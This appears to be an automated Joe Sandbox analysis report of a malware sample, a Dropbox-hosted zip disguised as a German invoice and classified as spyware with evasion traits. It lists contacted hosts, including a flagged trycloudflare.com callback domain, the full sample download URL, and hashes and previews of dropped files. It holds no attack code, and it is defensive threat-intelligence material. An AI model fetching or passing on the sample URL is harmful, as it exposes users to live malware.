C:\Users\user\Downloads\Python\Python312\DLLs\_asyncio.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_bz2.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_ctypes_test.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_decimal.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_elementtree.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_hashlib.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_lzma.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_msi.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_multiprocessing.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_overlapped.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_queue.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_socket.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_sqlite3.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_ssl.pyd0%VirustotalBrowse
C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pyd0%ReversingLabs
C:\Users\user\Downloads\Python\Python312\DLLs\_testbuffer.pyd0%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
edge-block-www-env.dropbox-dns.com0%VirustotalBrowse
www.google.com0%VirustotalBrowse
dl.dropboxusercontent.com3%VirustotalBrowse
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
edge-block-www-env.dropbox-dns.com
162.125.66.15
truefalseunknown
www.google.com
142.250.186.68
truefalseunknown
luck-transaction-en-function.trycloudflare.com
104.16.231.132
truetrue
    unknown
    dl.dropboxusercontent.com
    unknown
    unknownfalseunknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    142.250.186.68
    www.google.comUnited States
    15169GOOGLEUSfalse
    23.22.254.206
    unknownUnited States
    14618AMAZON-AESUSfalse
    142.250.110.84
    unknownUnited States
    15169GOOGLEUSfalse
    34.104.35.123
    unknownUnited States
    15169GOOGLEUSfalse
    1.1.1.1
    unknownAustralia
    13335CLOUDFLARENETUSfalse
    184.28.88.176
    unknownUnited States
    16625AKAMAI-ASUSfalse
    172.217.16.206
    unknownUnited States
    15169GOOGLEUSfalse
    162.125.66.15
    edge-block-www-env.dropbox-dns.comUnited States
    19679DROPBOXUSfalse
    104.16.231.132
    luck-transaction-en-function.trycloudflare.comUnited States
    13335CLOUDFLARENETUStrue
    239.255.255.250
    unknownReserved
    unknownunknownfalse
    142.250.186.131
    unknownUnited States
    15169GOOGLEUSfalse
    142.250.186.110
    unknownUnited States
    15169GOOGLEUSfalse
    184.28.90.27
    unknownUnited States
    16625AKAMAI-ASUSfalse
    172.64.41.3
    unknownUnited States
    13335CLOUDFLARENETUSfalse
    172.217.16.131
    unknownUnited States
    15169GOOGLEUSfalse
    IP
    192.168.2.17
    127.0.0.1
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1491553
    Start date and time:2024-08-12 14:20:23 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsinteractivecookbook.jbs
    Sample URL:https://dl.dropboxusercontent.com/scl/fi/4owe58ovn1ed21kp09mar/Rechnung-201528807699-vom-30.07.2024.zip?rlkey=jd0edpow40fhsvvb7o73yg1xi&st=x3gp2xzd&dl=0
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:36
    Number of new started drivers analysed:1
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    Analysis Mode:stream
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal64.spyw.evad.win@52/173@5/136
    • Exclude process from analysis (whitelisted): mrxdav.sys, svchost.exe
    • Excluded IPs from analysis (whitelisted): 172.217.16.131, 142.250.186.110, 142.250.110.84, 34.104.35.123
    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtCreateKey calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    Process:C:\Windows\System32\svchost.exe
    File Type:data
    Category:dropped
    Size (bytes):1310720
    Entropy (8bit):0.431588471332953
    Encrypted:false
    SSDEEP:
    MD5:39B72356335675891EB8BE5A0B0BA12B
    SHA1:57003400261AC803FEE3EB153EC66B3BACC71ED6
    SHA-256:3B8A32A45873A97441127487D29514EA17E3C673EB75B629071D9F474DF71924
    SHA-512:D612C1EF249FAF3933082FC8DD3AC35030E52926E1492F32F5FD63163CCBE7FE45536CF5D4FCF5A1442CDC5B4DC3F12F595058510947C2C8EF5930CA7CE18B57
    Malicious:false
    Reputation:unknown
    Preview:.B..........@..@ /...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................%.O._..r.#.........`h.................h...............X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
    Process:C:\Windows\System32\svchost.exe
    File Type:data
    Category:dropped
    Size (bytes):16384
    Entropy (8bit):0.07836155510869978
    Encrypted:false
    SSDEEP:
    MD5:563359BD8AC772926F890E1D00041B55
    SHA1:CE90ADE3EDA67F392ADF547ACECC31000F6D2815
    SHA-256:7B734EE303513B0705CD75824B78D381204A65719CF988EA7E40F8AE675456C0
    SHA-512:105662619BD0B32C99DE7F6B2739458F22E268843718A8F34BAB31AAE0566B96209C4C50CAE30158990D58DE6D5A6239AC20A20626714F64497F5FA40FB9E170
    Malicious:false
    Reputation:unknown
    Preview:#..%.....................................;...{.......|.......{...............{.......{..8. u.....{.&.........................|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):294
    Entropy (8bit):5.1034035870087475
    Encrypted:false
    SSDEEP:
    MD5:674F63855344E1FC3FF8AD29640A13FE
    SHA1:7728530EAAC711E11A490968766D4E9F39741063
    SHA-256:5BAD2A8AE1280BE6B19698E62D23932E4296B4B6D2BA3E6382DF1F71891390BF
    SHA-512:83BA7062A2B8957CF49B8799F9A50430111926AFF3F69AFCCCFD123E5CEF4D81DD73C2C0D7CE5EA72D1784C8851454BCC44EB8278AF31263CA2E2AE1015DABF1
    Malicious:false
    Reputation:unknown
    Preview:2024/08/12-08:21:18.716 1ee0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/08/12-08:21:18.718 1ee0 Recovering log #3.2024/08/12-08:21:18.718 1ee0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):338
    Entropy (8bit):5.128666741984327
    Encrypted:false
    SSDEEP:
    MD5:78CF0DD166DA53983B13C5978DC7E0A0
    SHA1:37F55EAD1207D98158668775D7EF1CF892131CA4
    SHA-256:EF60C59D36DB2A4C08FF8078507FFE5CA561D29BEFC96208A1333FB2A1001CA7
    SHA-512:76A7067314F13DAF34645CCD07BFAABF02C66D0EF041C1EC69F4481ECFD7B814D086EB9F6F40AA0FE235F50C417A600828008CC431DA895B512683C0190945D7
    Malicious:false
    Reputation:unknown
    Preview:2024/08/12-08:21:18.621 1efc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/08/12-08:21:18.625 1efc Recovering log #3.2024/08/12-08:21:18.625 1efc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):0
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:
    MD5:189D1E7452200FB5F191CA4C9612EEA9
    SHA1:946C6758AFEC0895387158C16B7DBC0CAEDC6ABE
    SHA-256:1BCC5FA9D73827B9F71217A320DA24E399596699AD273F6B2D5C430058E75B74
    SHA-512:7F325B33BAEC7001241643BED036D81D4A15280A646E4D76598FF67E210A401943967C3EBC60183A483E52DC020995E3059AF09DEE2EE5505CAAE52F1756F8E7
    Malicious:false
    Reputation:unknown
    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
    File Type:JSON data
    Category:modified
    Size (bytes):266
    Entropy (8bit):4.8399217827843
    Encrypted:false
    SSDEEP:
    MD5:189D1E7452200FB5F191CA4C9612EEA9
    SHA1:946C6758AFEC0895387158C16B7DBC0CAEDC6ABE
    SHA-256:1BCC5FA9D73827B9F71217A320DA24E399596699AD273F6B2D5C430058E75B74
    SHA-512:7F325B33BAEC7001241643BED036D81D4A15280A646E4D76598FF67E210A401943967C3EBC60183A483E52DC020995E3059AF09DEE2EE5505CAAE52F1756F8E7
    Malicious:false
    Reputation:unknown
    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
    File Type:data
    Category:dropped
    Size (bytes):6678
    Entropy (8bit):5.244171673530426
    Encrypted:false
    SSDEEP:
    MD5:0166F559DDEF987E9B9C5B4EC3E58E0A
    SHA1:CBBDFF64EC79C5F37BA4D5EF43141A0C54B4A8E9
    SHA-256:A04CDE2FC61948DE6D33684DB1B66B71276EEF2F79F5A61A92643899FF537162
    SHA-512:4EE9C7B679BC625D8A6377C939A844C98920BD55B7C56CFBC0E20C478CAAA8C2F402192CE2770ED8A49E64BC3D6CD0FBFEB7CA26201DD419F3BA42E99576DEA7
    Malicious:false
    Reputation:unknown
    Preview:*...#................version.1..namespace-....o................next-map-id.1.Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/.0F...r................next-map-id.2.Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/.1.p..r................next-map-id.3.Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.3..).^...............Pnamespace-42000ee3_e7f8_4e1a_acf9_c35e414a379e-https://rna-resource.acrobat.com/...^...............Pnamespace-ce27b6a8_7896_4616_ab45_36a5ede234ad-https://rna-resource.acrobat.com/.{VUa...............Snamespace-c3e8f6d4_f714_436a_92db_f0a4810aae6e-https://rna-v2-resource.acrobat.com/....a...............Snamespace-d0743b68_de08_4f3c_b7bc_aca178ee7ff1-https://rna-v2-resource.acrobat.com/yATuo................next-map-id.5.Pnamespace-eb3aef6d_d129_430c_a353_
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):326
    Entropy (8bit):5.1499805302243455
    Encrypted:false
    SSDEEP:
    MD5:59BF384A904BE881CD6B327F622E29C2
    SHA1:2CF2AE6BDAAD50867400E98B895B90ABBF5BC7E2
    SHA-256:EAA5E1D1B19E5C13FD14348AA99019F1030788DD0D5103071D33F9125587EE10
    SHA-512:F9DEC31B6D55E65C06513141FA35898A36FCEB6712894F8565B929A7A2D1B4224600F6E8B88E429430C1A0C576B47EFA3F77CBCF019475039516E83AE68083BE
    Malicious:false
    Reputation:unknown
    Preview:2024/08/12-08:21:18.758 1efc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/08/12-08:21:18.760 1efc Recovering log #3.2024/08/12-08:21:18.762 1efc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:PostScript document text
    Category:dropped
    Size (bytes):185099
    Entropy (8bit):5.182478651346149
    Encrypted:false
    SSDEEP:
    MD5:94185C5850C26B3C6FC24ABC385CDA58
    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
    Malicious:false
    Reputation:unknown
    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:PostScript document text
    Category:dropped
    Size (bytes):0
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:
    MD5:94185C5850C26B3C6FC24ABC385CDA58
    SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
    SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
    SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
    Malicious:false
    Reputation:unknown
    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:data
    Category:dropped
    Size (bytes):259864
    Entropy (8bit):3.202660492858591
    Encrypted:false
    SSDEEP:
    MD5:BE9BCC8BB2DB177C5D0157BDE4A1D3FE
    SHA1:31836566F2EBE2EB88519AA3771D24DB439D9457
    SHA-256:19D825CC20881511801CAA8DD9107805442C3B7685AF39FF16944287482659AD
    SHA-512:6BB9C6B2AD532D72F5B5D687B8D9F04CFBB4DFC62294283DCE484928F20BCAFD21E61798F303FA3CF7288B10CF0F4A6AC2B83E17C55BE9E819A9960ABF61BDCE
    Malicious:false
    Reputation:unknown
    Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):295
    Entropy (8bit):5.365571927474989
    Encrypted:false
    SSDEEP:
    MD5:8FF00638C04CA56736F37799D925108F
    SHA1:BF236C101E3CF232539AC01C5FBE9CD8E53671E3
    SHA-256:DFF1EF555A06B965773E7B2427A94E7CB57134D85EFBD624EE4E2B9916568ED8
    SHA-512:03FBEFF83B2703B854892CB7609006B8E8B481148F501B11CD095737385CA140BCF63B1409863CC1B1EE42DCEE1A9832F4A20F497620F234874DB2EC13D5609B
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):294
    Entropy (8bit):5.312910931880281
    Encrypted:false
    SSDEEP:
    MD5:CE5AA9EDC507AD38884CC9A34E63D76E
    SHA1:49905B8D6D2C0E5083CD04EAA957DB303EC27A2A
    SHA-256:B419AFF671D59EC77F935DB7F5E4D028373E1202F812BDB2D7E7907C94551109
    SHA-512:9CC11BC10B38BD73507B42FF863078719F377704407A7BEB90F10CD496D68D25D5FC0960AF85402286632B976563D2F2B44E851951BA0938A0A23ED30F1300B9
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):294
    Entropy (8bit):5.29161714610716
    Encrypted:false
    SSDEEP:
    MD5:5F215E6F62F77F48C3F9B6D950B368AD
    SHA1:9C239781D1AD5F70A2A035AB67F78C4B4B11ABD5
    SHA-256:762CF12AB2A0DFE10EE3CA592AB8F05AEB2DE76F9F163A511C81E8C8FC737AB4
    SHA-512:1C670254911C8F7A189A7939069490058F545DA69DD29C8197AFD0F6657A8C01EC8265B7443B9E32BF00126C6EADFFB2DDA02DF6FBA095094D189DE4CAEB2A4C
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):285
    Entropy (8bit):5.351745903910697
    Encrypted:false
    SSDEEP:
    MD5:CF916338FB3D9C26F8033E798911CE58
    SHA1:55E35BB0300A3672501EE477F0988103E75312B4
    SHA-256:025E3A4B976B3D52B78C6D8183C6FEC0432CC4A562ABA6AEA5D55C0A5F02D237
    SHA-512:5ADC014B0855B95A2087682DC892056D70B152B5AC7A9D2AF02A53F5B98D00B6F10BEF1084D8C1F36B4104ED6795A5A7198C3C1B3183066C3F1CE385D43A206B
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):1063
    Entropy (8bit):5.670318952042371
    Encrypted:false
    SSDEEP:
    MD5:399CC99DFD80EC327F434E9A00FE73E2
    SHA1:0E6EA5279CA7CF81022F8A53A90B4ECF79676364
    SHA-256:00FDBD9B7A741A04AC7CF3BE319EBC66C6A4B5BC57DD2E4DA670DF2F8D6DA188
    SHA-512:FD13537983B9C3AD27BDFE3D4B5E1F22C5519CAD9EE1AE51DED80B051D596295B12A95C4C0F60761C9C4BC53C048DB9B077F1B525D572A2B5CEF7832ABB5FCFD
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_2","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"afb9c2a3-eaf4-41f9-9d73-768e72f72282","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgZmlsZXMgdG8gYW5kIGZyb20gUERGXG53aXRob3V0IGxpbWl0cy4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingSc
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):1050
    Entropy (8bit):5.660465301374589
    Encrypted:false
    SSDEEP:
    MD5:79B7A804A5AAF59B19625C980720FB6E
    SHA1:21D7D374B12272692C99A727E7EBD9AAF3A95432
    SHA-256:8814D21AB5DF5B175D464317C927FF5E51DA9B6F4E974E0879451CCA8AFCBC87
    SHA-512:02A859B08C4A66495CFF87D74A119EB17A42627021C99DD4974A6B8B5E71C290978D527B6DA1A867C1A65799F0CBC771AA0C77DB8311BF82AB603B0B00B119E8
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):292
    Entropy (8bit):5.302733670504253
    Encrypted:false
    SSDEEP:
    MD5:765AF6AC9E2700B1AA87929FAC38FDEA
    SHA1:F311AC1E3118A8F9398BCF60AD4E6357139FA745
    SHA-256:DF721C63D24212C3386FB13BABE4B8F62F4DE0D8DE271CA989EADB2843C275F9
    SHA-512:264B8F0404768DD925E978CC2F45939D58550FD8FDE66EB211E364D81E0E5F79BB82D4AD6E1B715369975BEBEA6B4DD196C111D89AFAB7338C28214A31003D74
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):1038
    Entropy (8bit):5.652794008460874
    Encrypted:false
    SSDEEP:
    MD5:637BE1334C11EE21276BF318D850E066
    SHA1:F7B0D86FBC2EE2ED6645215372638BA10AFEB2C2
    SHA-256:5B4E5D62E5CE329CA4E76AC15358584741DC7B3E6FE8CAF386F4C67CF9AC00DB
    SHA-512:94835FFD8E1F16829C263D6B9473BE823265F7234E1FAEB41E2DCA5935618208D60211A2CF019EC906C7E7D56C7565965C097AB7EDF9631CCBA84F2080F68D0A
    Malicious:false
    Reputation:unknown
